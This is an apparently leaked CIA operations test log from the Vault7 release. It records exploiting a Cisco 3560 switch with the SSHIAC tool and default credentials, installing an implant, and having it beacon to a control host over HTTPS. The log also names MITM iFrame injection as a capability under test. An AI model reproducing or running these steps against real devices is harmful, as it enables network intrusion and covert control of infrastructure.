Vault7: CIA Hacking Tools Revealed
Navigation: » Latest version
Owner: User #1179928
JQJSlasher - Ops Testing
Cisco - 3560 IP:192.168.200.10
ICON-CT: 172.20.12.29 / Seeds Host 192.168.32.10 - VLAN32
Testing to focus on the following capabilities:
- Install
- Trigger
- Shell access
- MITM iFrame injectionSmoke Test Install / Functionality test to 24 Port 356
- Install HG / Set up basic comms with implant
- Un-tar delivery to ICON: /home/user1/slasher-2h_20150725/bin/ops/slasher-2h/
- Change ../slasher-2h/remote/data/config/npc3/target.py interPacketTime to 0.1 seconds
- nano ../ops/slash/slasher-2h/hg/slasher-2h.txt
- Change Interface = eth0
- Change Trigger address = 192.168.32.10 (Seeds host)
- Attack w/ SSHIAC from ICON: ./sshiac --ip 192.168.200.10:22 --l cisco:cisco password
-
LG
EC -125
DH
EC -60EC -159
M
-
- #cd ../../remote/
- source aliaeses
- remote>broad
- ./seq set 1
- remote>broad = GOOD - status OK
- nano target-aliases
- Change target ip = 192.168.200.10
- ProcID = 0x10423185
- Ran: ../slasher-2h/hg# ./prep-ct.sh
- = "File copy complete. CutThroat is ready for use."
- remote>hg_start
- = done, GOOD - status OK
- Result: 0xfffffffb
- Result: 0x00000001 (on 2nd 3560)
- Make listen window:
- ./cutthroat ilm_hg.so
- ilm listen slasher-2h.txt
- Make trigger window:
- ./cutthroat ilm_hg.so
- ilm trigger slasher-2h.txt
- beacon call_base_back https 172.20.12.29 443
- SSL Handshake completes in listen window
-
Test basic functionality of initial install
- In listen window> modeule show
- = All modules running after initial install
- In listen window> modeule show
-
Test HG Install with AAASecurity Server from Cisco configured similar to target device
- Configure 3560 with AAASecurity Server from Cisco settings from target config
- Save config and reload 3560 target
- Test ssh to confirm AAASecurity Server from Cisco works natively:
- sssh -l root 192.168.200.10
- password: password
- >en = password
- = successful login
- sssh -l root 192.168.200.10
- Attack with SSHIAC
-
./sshiac --ip 192.168.200.10:22 --l root:password password
LG
EC -122
E gs failed
E
-
./sshiac --ip 192.168.200.10:22 --l root:password password